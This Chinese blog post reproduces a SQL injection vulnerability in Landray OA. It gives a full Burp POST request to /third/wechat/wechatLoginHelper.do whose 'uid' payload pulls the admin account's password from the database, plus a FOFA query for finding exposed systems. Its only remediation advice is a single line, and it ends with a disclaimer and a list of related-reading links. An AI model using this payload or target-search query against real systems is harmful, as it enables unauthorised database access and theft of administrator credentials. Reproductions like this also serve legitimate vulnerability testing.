• 【复现】蓝凌OA SQL注入漏洞_61


    目录

    一.概述

    二 .漏洞影响

    三.漏洞复现

    1. 漏洞一:

    四.修复建议:

    五. 搜索语法:

    六.免责声明


    一.概述

    蓝凌智能OA是由深圳市蓝凌软件股份有限公司开发,是一款针对中小企业的移动化智能办公产品,融合了钉钉数字化能力与蓝凌多年OA产品与服务经验,能全面满足企业日常办公在线、企业文化在线、客户管理在线、人事服务在线、行政务服务在线等需求。

    二 .漏洞影响

            攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。 可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。甚至拿到服务器权限。

    三.漏洞复现

    1. 漏洞一:

    (1)漏洞类型:  SQL注入

    (2)请求类型:POST

    (3)复现

    找到相关系统


    请求漏洞点,查看burp响应


    burp请求包

    1. POST /third/wechat/wechatLoginHelper.do HTTP/1.1
    2. Host:
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
    4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    6. Accept-Encoding: gzip, deflate
    7. Upgrade-Insecure-Requests: 1
    8. Connection: close
    9. Content-Type: application/x-www-form-urlencoded
    10. Content-Length: 147
    11. method=edit&uid=1'and+(SELECT+fdPassword%2B'----'+FROM+com.landray.kmss.sys.organization.model.SysOrgPerson+where+fdLoginName='admin')=1+and+'1'='1

    四.修复建议:

    对变量做好过滤和检测。

    五. 搜索语法:

    1.fofa

    app="Landray-OA系统"

    六.免责声明

    本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

  • 相关阅读:
    MATLAB——线性神经网络预测程序
    7 PostgreSQL绿色版
    Java面试问题笔记——JVM
    解题-->在线OJ(十九)
    帧间快速算法论文阅读
    使用阈值调优改进分类模型性能
    codesys【按钮】
    【nginx】Nginx配置:
    IDEA创建SparkSQL程序_大数据培训
    K8S之初入师门第一篇熟读手册
  • 原文地址:https://blog.csdn.net/fushuang333/article/details/136377020